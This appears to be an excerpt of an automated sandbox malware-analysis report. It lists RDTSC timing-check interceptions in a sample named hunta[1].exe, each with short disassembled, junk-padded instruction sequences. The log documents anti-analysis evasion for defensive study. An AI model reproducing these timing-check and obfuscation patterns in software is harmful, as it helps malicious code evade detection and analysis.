Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 122FDD6 second address: 122FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1245C29 second address: 1245C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1245C2D second address: 1245C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D986 second address: 126D98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D98A second address: 126D99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C2Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126C7D4 second address: 126C7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF2E5514DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CACF second address: 126CB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF2E55A2C2Bh 0x0000000d pop edi 0x0000000e jmp 00007FF2E55A2C2Eh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CB06 second address: 126CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FF2E5514DE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CB19 second address: 126CB32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CB32 second address: 126CB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CCA3 second address: 126CCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CCA9 second address: 126CCB3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CDFD second address: 126CE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126CE1F second address: 126CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D100 second address: 126D10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF2E55A2C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D10B second address: 126D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D111 second address: 126D119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D587 second address: 126D58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D58B second address: 126D591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D591 second address: 126D59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D59A second address: 126D5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 126D6CE second address: 126D6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12719E9 second address: 12719F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12719F3 second address: 12719F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 592092B second address: 592092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 592092F second address: 5920935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58F00FD second address: 58F010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58F010C second address: 58F0176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E5514DEEh 0x0000000f push eax 0x00000010 jmp 00007FF2E5514DEBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF2E5514DF6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF2E5514DF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59608B2 second address: 59608B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0BD2 second address: 58E0BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0BD8 second address: 58E0C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 and ax, 1228h 0x0000000e jmp 00007FF2E55A2C2Bh 0x00000013 popfd 0x00000014 mov si, EB1Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C31h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0C14 second address: 58E0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 sbb si, 40CEh 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF2E5514DF0h 0x0000001a adc ax, 3948h 0x0000001f jmp 00007FF2E5514DEBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FF2E5514DEFh 0x0000002f mov ah, 3Fh 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF2E5514DEEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0C98 second address: 58E0C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0C9E second address: 58E0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0CA2 second address: 58E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, di 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0CD0 second address: 58E0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58E0CD5 second address: 58E0CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309AA second address: 59309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309AE second address: 59309B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309B2 second address: 59309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309B8 second address: 59309E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 34h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 3DFD71AFh 0x00000012 pushad 0x00000013 call 00007FF2E55A2C32h 0x00000018 pop eax 0x00000019 mov eax, edi 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309E9 second address: 59309ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309ED second address: 59309F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309F1 second address: 59309F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309F7 second address: 59309FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59309FD second address: 5930A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930A01 second address: 5930A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930A18 second address: 5930A35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5980379 second address: 598037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 598037F second address: 5980383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5980383 second address: 59803B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59803B3 second address: 59803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59803B9 second address: 59803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960E03 second address: 5960E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960E09 second address: 5960E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58F054D second address: 58F0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58F0553 second address: 58F0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 58F0557 second address: 58F0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF2E5514DEEh 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dl, 1Ch 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 596063D second address: 5960662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960662 second address: 5960668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960668 second address: 596066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 596066C second address: 59606ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF2E5514DEFh 0x00000013 jmp 00007FF2E5514DF3h 0x00000018 popfd 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF2E5514DF6h 0x00000020 xor esi, 3A0D51E8h 0x00000026 jmp 00007FF2E5514DEBh 0x0000002b popfd 0x0000002c mov ecx, 076D95DFh 0x00000031 popad 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF2E5514DECh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59606ED second address: 59606F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59606F1 second address: 59606F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59606F7 second address: 596070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov di, F68Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 596070C second address: 5960728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960728 second address: 596073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960C5C second address: 5960C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960C79 second address: 5960C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 6CE9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960C98 second address: 5960C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960C9D second address: 5960CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E55A2C2Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 push edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960CCF second address: 5960CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960CD4 second address: 5960D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF2E55A2C2Eh 0x0000000a xor si, 8348h 0x0000000f jmp 00007FF2E55A2C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 5CC8DA24h 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 jmp 00007FF2E55A2C33h 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 pop edi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pushfd 0x00000039 jmp 00007FF2E55A2C2Ch 0x0000003e xor al, 00000008h 0x00000041 jmp 00007FF2E55A2C2Bh 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF2E55A2C35h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930929 second address: 593092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593092D second address: 5930933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5960F85 second address: 5960F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59107F3 second address: 5910877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b sbb al, 0000004Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushfd 0x00000024 jmp 00007FF2E55A2C33h 0x00000029 jmp 00007FF2E55A2C33h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FF2E55A2C2Ah 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cx, di 0x00000044 mov dx, F0CCh 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970E0A second address: 5970E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E484h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E5514DEFh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970E2E second address: 5970E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970E32 second address: 5970E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970E38 second address: 5970EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FF2E55A2C34h 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Eh 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 mov eax, dword ptr [777265FCh] 0x00000025 jmp 00007FF2E55A2C2Dh 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d pushad 0x0000002e mov dh, ch 0x00000030 mov bl, 77h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 popad 0x00000038 je 00007FF3572D56F7h 0x0000003e pushad 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov edi, 7D806BD2h 0x00000048 popad 0x00000049 push edi 0x0000004a movzx ecx, di 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF2E55A2C2Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970EBD second address: 5970F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FF2E5514DF3h 0x0000000c and eax, 26EE5D2Eh 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF2E5514DF8h 0x00000027 jmp 00007FF2E5514DF5h 0x0000002c popfd 0x0000002d mov bh, cl 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970F32 second address: 5970F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF2E55A2C30h 0x00000011 ror eax, cl 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970F6C second address: 5970F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59701E4 second address: 5970237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF2E55A2C33h 0x00000015 sbb ecx, 2A981A3Eh 0x0000001b jmp 00007FF2E55A2C39h 0x00000020 popfd 0x00000021 movzx eax, dx 0x00000024 popad 0x00000025 rdtsc
